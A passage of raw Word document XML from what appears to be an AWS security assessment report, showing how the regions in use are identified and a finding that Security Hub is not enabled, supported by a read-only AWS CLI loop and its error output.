        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="705" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Please note that, as most of the AWS services are region-based, it is important to determine which regions are used first, to focus the analysis on the regions that are actually in use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Preliminary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>steps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>determine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>regions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>used:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="96" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Navigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>global</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>EC2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>view,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="1440" w:right="475"/>
      </w:pPr>
      <w:hyperlink r:id="rId203">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://us-east-1.console.aws.amazon.com/ec2globalview/home?region=us-east-</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId203">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-10"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>various</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>columns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>regions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>used.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>regions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>us-east-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>us-east-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="134"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>enabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="192"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="705" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Security Hub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>134</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> is a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>region-based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>provides</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>comprehensive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>view</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>security issues from regions where it is enabled. The following command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>describes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Security Hub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>for the regions in use:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="35"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487618560">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>184025</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="84" name="Graphic 84"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="84" name="Graphic 84"/>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4.490234pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15697920;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape69" coordorigin="1440,290" coordsize="2880,0" path="m1440,290l4320,290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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>134</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="60"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId204">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/securityhub/latest/userguide/securityhub-get-started.htm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>l</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Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="95"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for r in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"us-east-1" "us-east-2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>; do aws securityhub --profile auth describe-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>hub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--region $r; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="171"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="95"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>An</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="74"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="74"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>occurred</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="59"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(InvalidAccessException)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="59"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="59"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>calling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="59"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="59"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DescribeHub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="59"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>operation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
